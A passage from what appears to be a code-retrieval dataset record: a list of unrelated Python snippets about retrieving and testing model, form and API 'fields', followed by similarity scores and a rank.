field in fields}\n return jsonify(result)", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) #aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "def get_fields():\n return jsonify(result=Tree.fields())", "def test_max_features_first_page(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=5)\n assert len(df) == 5", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def fields(self):\r\n return self._by_name.iteritems()", "def get_fields(self):\n return list(self.metadata.keys())", "def fields(self, forge, values):\n\n values[\"forge\"] = forge['id']\n\n fields = opengui.Fields(\n values=values,\n fields=FIELDS,\n ready=True\n )\n\n fields[\"forge\"].description = forge[\"description\"]\n\n if os.path.exists(\"/opt/service/forge/fields.yaml\"):\n with open(\"/opt/service/forge/fields.yaml\", \"r\") as fields_file:\n fields.extend(yaml.safe_load(fields_file).get(\"fields\", []))\n\n for field in forge.get(\"input\", {}).get(\"fields\", []):\n if field[\"name\"] in RESERVED:\n raise Exception(f\"field name '{field['name']}' is reserved\")\n self.field(fields, field)\n\n return fields", "def fields(self, _only_called=False, **kwargs):\n\n # Check for an operator and transform to mongo-style if there is one\n operators = [\"slice\"]\n cleaned_fields = []\n for key, value in kwargs.items():\n parts = key.split(\"__\")\n if parts[0] in operators:\n op = parts.pop(0)\n value = {\"$\" + op: value}\n\n key = \".\".join(parts)\n try:\n field_name, value = self._check_valid_field_name_to_project(key, value)\n except ValueError as e:\n raise e\n\n 
cleaned_fields.append((field_name, value))\n\n # divide fields on groups by their values\n # (ONLY group, EXCLUDE group etc.) and add them to _loaded_fields\n # as an appropriate QueryFieldList\n fields = sorted(cleaned_fields, key=operator.itemgetter(1))\n for value, group in itertools.groupby(fields, lambda x: x[1]):\n fields = [field for field, value in group]\n self._loaded_fields += QueryFieldList(fields, value=value, _only_called=_only_called)\n\n return self", "def extract(self):\n self.field_list = []\n \n try:\n self.mfields = self.getModel()._meta.fields\n if(self.mfields):\n try:\n for model_fields in self.mfields:\n if(model_fields.name == \"id\"):\n pass \n \n elif(model_fields.name == \"pci\"):\n pass \n elif(model_fields.name == \"sci\"):\n pass \n elif(model_fields.name == \"validated\"):\n pass \n else:\n self.field_list.append(model_fields.name)\n return self.field_list\n except:\n raise \n else:\n return None \n except:\n raise", "def fields(self):\r\n if not hasattr(self, '_fields'):\r\n self._fields = dict((clean_field_title(pc.title), pc.get_content())\r\n for pc in self.pagecontent_set.all())\r\n\r\n return self._fields", "def get_fieldlist(cls):\n return cls.fieldlist", "def objectFields(self):\n raise NotImplementedError", "def get_page_fields(self) -> list:\n project_page_fields = [\n 'project.name', 'project.short_description',\n 'project.created', 'project.changeset_comment',\n 'project.external_source.instructions',\n 'project.external_source.per_task_instructions',\n 'project.external_source.imagery',\n 'project.external_source.license',\n 'project.url', 'project.project_id', 'project.users'\n ]\n return project_page_fields", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def get_items(id_name, request, client):\n result = client.quick_search(request)\n \n items_pages = []\n limit_to_x_pages = None\n for page in result.iter(limit_to_x_pages):\n items_pages.append(page.get())\n\n items = [item for page in items_pages for item in page['features']]\n \n \n return (id_name, items)", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 4)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_exp_meta(self, count=0):\n return {\n u\"limit\": 20,\n u\"next\": None,\n u\"offset\": 0,\n u\"previous\": None,\n u\"total_count\": count,\n }", "def test_all_features_paged(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(query=PropertyIsGreaterThanOrEqualTo(\n 'diepte_tot_m', '0'), return_fields=['pkey_boring'])\n assert len(df) == 20", "def field_names(self):\n ...", "def explore_all_nf_data():\n request = app.current_request\n resource_type = request.query_params[\"resource_type\"]\n offset = int(request.query_params[\"offset\"])\n limit = int(request.query_params[\"limit\"])\n explorer = UnogsExplorer(resource_type)\n success = explorer.explore(limit, offset)\n return {\"success\": success}", "def 
get_fields(self):\n \n return self.metadata.keys()", "def test_Fieldform_has_fields(self):\n self.assertSequenceEqual(\n [\n \"date\",\n \"start_time\",\n \"end_time\",\n \"temperature\",\n \"humidity\",\n \"coordinator\",\n \"staff\",\n \"parcel_id\",\n ],\n list(self.Fieldform.fields),\n )", "def get_fields(self):\n\t\treturn self.__fields.copy()", "def test_get_hyperflex_feature_limit_internal_list(self):\n pass", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def test_fetchSpecificHeaderFieldsWithoutHeaders(self):\n self.assertFetchSpecificFieldsWithEmptyList(\"HEADER.FIELDS\")", "def all_fields(item):\n return scom.all_fields(item)", "def get_fields(self, request, obj=None):\n if obj:\n return self.fields\n return self.add_fields", "def get_features(item, GP):\n contents_url = '%s/contents' % item['url']\n\n # scrape readme\n gf.get_readme_length(contents_url, GP)\n\n # scrape file-by-file stats\n digest_repo(contents_url, GP)\n\n # scrape commit history\n gf.get_repo_commit_history(item, GP)\n\n # scrape stargazers\n GP.n_stars = item['stargazers_count']\n\n # scrape forks\n GP.n_forks = item['forks_count']\n\n return GP", "def get_api_fields(cls):\n return ['fqdn', 'ttl', 'description', 'views']", "def get_readonly_fields(self, request, obj=None):\n if not self.all_fields_readonly or (request.user.is_superuser and self.superuser_skips_all_readonly):\n return self.readonly_fields\n print self.fieldsets\n print list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))\n if self.fieldsets:\n return flatten_fieldsets(self.fieldsets)\n \n else:\n return list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))", "def get_fields(node):\r\n return dict(iter_fields(node))", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 5)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('name' in form.fields)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_fields(self, request, obj=None):\n if obj and obj.cwr:\n return (\n 'nwr_rev', 'description', 'works', 'filename', 'view_link',\n 'download_link')\n else:\n return ('nwr_rev', 'description', 'works')", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': 
self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get(self) -> list:\n return self.__expedition", "def get_returnable_fields(result, verbose=False):\n check_result(result)\n result_info = get_result(result)\n returnable_fields = result_info[\"returnable_fields\"]\n if verbose:\n pprint(returnable_fields)\n return returnable_fields", "def get(self):\n return parse_fields(raw=self._get())", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def get_fields(self):\n \n fields = []\n for order in self.order_lst:\n fields += order.get_fields()\n \n fields = list(set(fields))\n \n out_fields = self.eod.sort_fields(fields)\n \n return out_fields", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def get_issues_data(org, query_limit):\n variables = {\n \"search_query\": f\"org:{org}\",\n \"size\": query_limit,\n }\n query = get_data_query('graphql/issues_data.gql')\n\n return get_data(query, variables)", "def getFieldNumbers():\n return _getCampaignDict()[\"field_numbers\"]", "def getFields(iface):\n return getFieldsInOrder(iface)", "def get_fields(self, resource):\n\n def _get_fields_key(resource):\n \"\"\"Returns the fields key from a resource dict\n\n \"\"\"\n if resource['code'] in [HTTP_OK, HTTP_ACCEPTED]:\n if (MODEL_RE.match(resource_id) or\n ANOMALY_RE.match(resource_id)):\n return resource['object']['model']['model_fields']\n elif CLUSTER_RE.match(resource_id):\n return resource['object']['clusters']['fields']\n elif CORRELATION_RE.match(resource_id):\n return resource['object']['correlations']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif LOGISTIC_REGRESSION_RE.match(resource_id):\n return resource['object']['logistic_regression']['fields']\n elif ASSOCIATION_RE.match(resource_id):\n return resource['object']['associations']['fields']\n elif SAMPLE_RE.match(resource_id):\n return dict([(field['id'], field) for field in\n resource['object']['sample']['fields']])\n else:\n return resource['object']['fields']\n return None\n\n if isinstance(resource, dict) and 'resource' in resource:\n resource_id = resource['resource']\n elif (isinstance(resource, basestring) and (\n SOURCE_RE.match(resource) or DATASET_RE.match(resource) or\n MODEL_RE.match(resource) or PREDICTION_RE.match(resource))):\n resource_id = resource\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n else:\n LOGGER.error(\"Wrong resource id\")\n return\n # Tries to extract fields information from resource dict. 
If it fails,\n # a get remote call is used to retrieve the resource by id.\n fields = None\n try:\n fields = _get_fields_key(resource)\n except KeyError:\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n fields = _get_fields_key(resource)\n\n return fields", "def get_fields_for_cr(cr_id):\n # Construct request\n url = \"{}/reports/{}/patient_fields\"\n url = url.format(FABRIC_API_URL, cr_id)\n\n sys.stdout.flush()\n result = requests.get(url, auth=auth)\n return result.json()", "def get_more_records(self):\n\n\t\treturn self.__more_records", "def _dataset_fields(geno):\n return {'title': geno['title'], 'notes': geno.get('notes', '')}", "def show_fields(self,\r\n ef_temp=None):\r\n\r\n returnstr = EMPTYCHAR\r\n temp_dict = {}\r\n returnset = set()\r\n for k_temp in self.default_dict['field']:\r\n k_temp = str(k_temp)\r\n\r\n if self.default_dict['field'][k_temp] in temp_dict:\r\n temp_dict[self.default_dict['field'][k_temp]].add(k_temp)\r\n else:\r\n temp_dict[self.default_dict['field'][k_temp]] = {k_temp}\r\n\r\n for k_temp in temp_dict:\r\n returnstr += (k_temp+' : '\r\n +str(rangelist.range_find([Index(a_temp)\r\n for a_temp\r\n in temp_dict[k_temp]],reduce=True)).replace(SLASH,LONGDASH)+EOL)\r\n if ef_temp is None:\r\n\r\n return returnstr\r\n\r\n for f_temp in ef_temp:\r\n returnset = returnset.union(temp_dict[f_temp])\r\n return returnset", "def get(self, field: str, value: str):\n data = {\n 'query': {\n 'object': 'EEXPENSES',\n 'select': {\n 'field': [\n 'RECORDNO',\n 'RECORDID',\n 'WHENCREATED',\n 'WHENPOSTED',\n 'TOTALENTERED',\n 'STATE',\n 'TOTALDUE',\n 'DESCRIPTION',\n 'CURRENCY',\n 'BASECURR',\n 'MEMO'\n ]\n },\n 'filter': {\n 'equalto': {\n 'field': field,\n 'value': value\n }\n },\n 'pagesize': '2000'\n }\n }\n\n return self.format_and_send_request(data)['data']", "def list_meta_fields():\n ret = {}\n status, result = _query(action=\"meta\", command=\"fields\")\n root = ET.fromstring(result)\n for field in root:\n field_id = None\n field_ret = {\"name\": field.text}\n for item in field.items():\n field_ret[item[0]] = item[1]\n if item[0] == \"id\":\n field_id = item[1]\n ret[field_id] = field_ret\n return ret", "def db_fields(self):", "def fields(self) -> Dict[str, Field]:\n return self._fields", "def test_fetchSpecificHeaderFieldsNotWithoutHeaders(self):\n self.assertFetchSpecificFieldsWithEmptyList(\"HEADER.FIELDS.NOT\")", "def get_details(self):", "def get_fields(cls):\n return cls.fields.values()", "def _all_data_fields(field):\n all_fields = PhotoTech.objects.all().values()\n return list(set([all_fields[x][field]\n for x in range(len(all_fields))]))" ]
[ "0.7630596", "0.71610755", "0.619276", "0.5935856", "0.5886932", "0.56719977", "0.56685346", "0.56128865", "0.5601622", "0.55978966", "0.55809444", "0.5578002", "0.55722994", "0.54728", "0.5469623", "0.5441008", "0.543378", "0.5390191", "0.5388459", "0.5369778", "0.5361909", "0.5316519", "0.5309478", "0.5309478", "0.52869046", "0.52429986", "0.52423596", "0.5213579", "0.520554", "0.5162964", "0.5138115", "0.51292866", "0.51155233", "0.50859845", "0.5067399", "0.50671124", "0.5064751", "0.5058002", "0.50471735", "0.50453645", "0.5039166", "0.5036336", "0.5036096", "0.5031893", "0.49971777", "0.49900404", "0.4972378", "0.49471077", "0.49432823", "0.4941458", "0.4938249", "0.4937504", "0.49254754", "0.49098217", "0.4903477", "0.489302", "0.48925886", "0.48903704", "0.48889676", "0.4887805", "0.4879936", "0.48657992", "0.48344672", "0.48259538", "0.48231593", "0.4811193", "0.48086205", "0.4806506", "0.48010623", "0.47978172", "0.47963983", "0.47954604", "0.47950658", "0.47898933", "0.47836366", "0.47835636", "0.4781751", "0.47784838", "0.4770445", "0.47679174", "0.4765149", "0.47608462", "0.47506836", "0.47445935", "0.47199368", "0.47191304", "0.47128955", "0.47101116", "0.47083703", "0.47033197", "0.4702533", "0.47002044", "0.46910805", "0.4676496", "0.46670267", "0.46658164", "0.46641374", "0.46597832", "0.4657733", "0.46574047" ]
0.8270363
0
fetcher.get_explore_fields() should return fields when an explore has only dimensions or only measures.
def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores( fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores ): expected = test_dimensions_or_measures_only_explores[0] explore = fc.get_explores(model=test_model["name"], explore=expected["name"]) assert isinstance(explore, list) actual = explore[0] assert actual.name == expected["name"] assert not (actual.fields.dimensions and actual.fields.measures) expected_fields = [f["name"] for f in expected["fields"]] actual_fields = fc.get_explore_fields(actual) assert actual_fields == expected_fields
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def test_get_featured_front_page_returns_required_fields(self):\r\n\r\n app = self.create_app(None)\r\n app.owner = self.user\r\n db.session.add(app)\r\n featured = Featured(app=app)\r\n db.session.add(featured)\r\n db.session.commit()\r\n fields = ('id', 'name', 'short_name', 'info', 'n_volunteers', 'n_completed_tasks')\r\n\r\n featured = cached_apps.get_featured_front_page()[0]\r\n\r\n for field in fields:\r\n assert featured.has_key(field), \"%s not in app info\" % field", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def 
get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def get_query_fields(cls):\n ...", "def _get_fields(self):\n return self._fields", "def get_fields(self):\r\n return self.fields", "def fields(self):", "def _all_fields_all_data():\n # Takes all name fields\n all_fields = PhotoTech.objects.all().values()[0].keys()\n # For all fileds takes all fields data \n all_data = [PhotoView._all_data_fields(x) for x in all_fields]\n allowed_search_fields = ['zoom',\n 'matrix_resol',\n 'color',\n 'matrix_size',\n 'country']\n # Return dict {keys: fields}\n return {x: y for x, y in zip(all_fields, all_data)\n if x in allowed_search_fields}", "def fields(self):\n ...", "def _create_dimension_queries(\n self, explore: Explore, model_name: str\n ) -> List[Query]:\n queries = []\n for dimension in explore.dimensions:\n query = self.client.create_query(model_name, explore.name, [dimension.name])\n query = Query(\n query[\"id\"], lookml_ref=dimension, explore_url=query[\"share_url\"]\n )\n queries.append(query)\n return queries", "def fields(self):\r\n pass", "def get_fields_list(self):\n return self.description[\"fields\"][\"values\"].keys()", "def get_fields(self):\n return self.fields", "def get_fields(self):\n return self.fields", "def listFields(self):\n return self.get_json('/field')", "def fieldsUrl(self):\n return self.lweBaseUrl + \\\n \"/collections/\" + self.collectionName + \\\n \"/fields\"", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def getData(self):\n import labstep.entities.experimentDataField.repository as experimentDataFieldRepository\n\n return experimentDataFieldRepository.getDataFields(self)", "def _commercial_fields(self):\n return ['website']", "def GatherPageData(self, mr):\n # TODO(jrobbins): Allow deep-linking into this page.\n canned_query_views = []\n if mr.project_id:\n with mr.profiler.Phase('getting canned queries'):\n canned_queries = self.services.features.GetCannedQueriesByProjectID(\n mr.cnxn, mr.project_id)\n canned_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(canned_queries)]\n\n saved_query_views = []\n if mr.auth.user_id and self.services.features:\n with mr.profiler.Phase('getting saved queries'):\n saved_queries = self.services.features.GetSavedQueriesByUserID(\n mr.cnxn, mr.me_user_id)\n saved_query_views = [\n savedqueries_helpers.SavedQueryView(sq, idx + 1, None, None)\n for idx, sq in enumerate(saved_queries)\n if (mr.project_id in sq.executes_in_project_ids or\n not mr.project_id)]\n\n return {\n 'issue_tab_mode': 'issueAdvSearch',\n 'page_perms': self.MakePagePerms(mr, None, permissions.CREATE_ISSUE),\n 'canned_queries': canned_query_views,\n 'saved_queries': saved_query_views,\n }", "def get_fields(self):\n \n return self.metadata.keys()", "def get_fields(self):\n return list(self.metadata.keys())", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def fields(request):\n # Only recognizes a few fields for now.\n if request.method != 'POST':\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n 
response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response\n\n if not request.issue.edit_allowed:\n if not IS_DEV:\n return HttpTextResponse('Login required', status=401)\n fields = json.loads(request.POST.get('fields'))\n issue = request.issue\n if 'description' in fields:\n issue.description = fields['description']\n if 'reviewers' in fields:\n issue.reviewers = _get_emails_from_raw(fields['reviewers'])\n issue.calculate_updates_for()\n if 'subject' in fields:\n issue.subject = fields['subject']\n issue.put()\n return HttpTextResponse('')", "def _dataset_fields(geno):\n return {'title': geno['title'], 'notes': geno.get('notes', '')}", "def Fields(self):\n return self._fields", "def get_host_data_fields(self):\n\n raise NotImplementedError", "def get_fields(data):\n return data['train'][data['train'].keys()[0]].attrs.keys()", "def get_fields(self, request, obj=None):\n if obj and obj.cwr:\n return (\n 'nwr_rev', 'description', 'works', 'filename', 'view_link',\n 'download_link')\n else:\n return ('nwr_rev', 'description', 'works')", "def listMetaDataFields(self, exclude=True):\n #tool = getToolByName(self, ATCT_TOOLNAME)\n #original_list = tool.getMetadataDisplay(exclude)\n\n return DisplayList((\n ('getAnalysisCategory', _p('Analysis Category')),\n ('getAnalysisService', _p('Analysis Service')),\n ('getAnalysts', _('Analyst')),\n ('getClientOrderNumber', _('Client Order')),\n ('getClientReference', _('Client Reference')),\n ('getClientSampleID', _('Client Sample ID')),\n ('getClientTitle', _('Client')),\n ('getContactTitle', _('Contact')),\n ('Creator', _p('Creator')),\n ('created', _('Date Created')),\n ('getDatePublished', _('Date Published')),\n ('getDateReceived', _('Date Received')),\n ('getDateSampled', _('Date Sampled')),\n ('getProfilesTitle', _('Analysis Profiles')),\n ('getRequestID', _('Request ID')),\n ('getSampleID', _('Sample ID')),\n ('getSamplePointTitle', _('Sample Point')),\n ('getSampleTypeTitle', _('Sample Type')),\n ('review_state', _p('Review state')),\n ))", "def f(self):\r\n return self.fields()", "def _get_fields(self):\n if not self._cursor.description:\n return {}\n\n results = {}\n column = 0\n\n for des in self._cursor.description:\n fieldname = des[0]\n results[column] = fieldname\n column = column + 1\n\n return results", "def get_fields(self, dm_name):\n dm = self.get_dm(dm_name)\n return dm['mdmFields']", "def extract_fields(self, json_dict):\n raise NotImplementedError()", "def readAccessedFields(self):\n pass", "def get_features(self, request, **kwargs):\n raise NotImplementedError()", "def features(self) -> Optional[pulumi.Input['DevToolPortalFeatureSettingsArgs']]:\n return pulumi.get(self, \"features\")", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def test_query_api_result_fields():\n # Pick the first result and test for all fields\n result = query_api(url, \"test\")[0]\n assert all(field in result.keys() for field in fields)", "def fields(self):\r\n return self._by_name.iteritems()", "def get_fields(self):\n\n\t\treturn self.__fields", "def request_fields(self, fields=None):\n # The cursor only works for the 'search' endpoint, just call\n # the 'field' endpoint and return all the field types\n response = self.connection.get_request(self.uri_field)\n if response.status_code != requests.codes.ok:\n logger.warning('JIRA Cloud returned %d for %s', response.status_code, self.uri_field)\n return []\n 
content = json.loads(response.content)\n # Overwrite some fields\n for c in content:\n if c['name'] == 'Epic Status':\n c['schema']['type'] = 'string'\n c['choices'] = (('To Do', 'To Do'), ('In Progress', 'In Progress'), ('Done', 'Done'))\n elif c['name'] == 'Resolution':\n c['choices'] = self._get_resolutions()\n\n # The KEY field is never returned\n c = {\n \"id\": \"key\",\n \"key\": \"key\",\n \"name\": \"Key\",\n \"custom\": False,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"key\",\n ],\n \"schema\": {\n \"type\": \"string\",\n }\n }\n content.append(c)\n # The parent field is never returned\n c = {\n \"id\": \"parent\",\n \"key\": \"parent\",\n \"name\": \"Parent\",\n \"custom\": True,\n \"orderable\": True,\n \"navigable\": True,\n \"searchable\": True,\n \"clauseNames\": [\n \"parent\",\n ],\n \"schema\": {\n \"type\": \"any\",\n \"custom\": \"com.django-atlassian:parent\"\n }\n }\n content.append(c)\n return content", "def QueryFields(self, what, fields=None, reason=None):\n query = []\n _AppendReason(query, reason)\n\n if fields is not None:\n _AppendIf(query, True, (\"fields\", \",\".join(fields)))\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/query/%s/fields\" %\n (GANETI_RAPI_VERSION, what)), query, None)", "def extract(self):\n self.field_list = []\n \n try:\n self.mfields = self.getModel()._meta.fields\n if(self.mfields):\n try:\n for model_fields in self.mfields:\n if(model_fields.name == \"id\"):\n pass \n \n elif(model_fields.name == \"pci\"):\n pass \n elif(model_fields.name == \"sci\"):\n pass \n elif(model_fields.name == \"validated\"):\n pass \n else:\n self.field_list.append(model_fields.name)\n return self.field_list\n except:\n raise \n else:\n return None \n except:\n raise", "def objectFields(self):\n raise NotImplementedError", "def lookml_model_explore_with_http_info(self, lookml_model_name, explore_name, **kwargs):\n\n all_params = ['lookml_model_name', 'explore_name', 'fields']\n all_params.append('callback')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method lookml_model_explore\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'lookml_model_name' is set\n if ('lookml_model_name' not in params) or (params['lookml_model_name'] is None):\n raise ValueError(\"Missing the required parameter `lookml_model_name` when calling `lookml_model_explore`\")\n # verify the required parameter 'explore_name' is set\n if ('explore_name' not in params) or (params['explore_name'] is None):\n raise ValueError(\"Missing the required parameter `explore_name` when calling `lookml_model_explore`\")\n\n\n collection_formats = {}\n\n resource_path = '/lookml_models/{lookml_model_name}/explores/{explore_name}'.replace('{format}', 'json')\n path_params = {}\n if 'lookml_model_name' in params:\n path_params['lookml_model_name'] = params['lookml_model_name']\n if 'explore_name' in params:\n path_params['explore_name'] = params['explore_name']\n\n query_params = {}\n if 'fields' in params:\n query_params['fields'] = params['fields']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # HTTP 
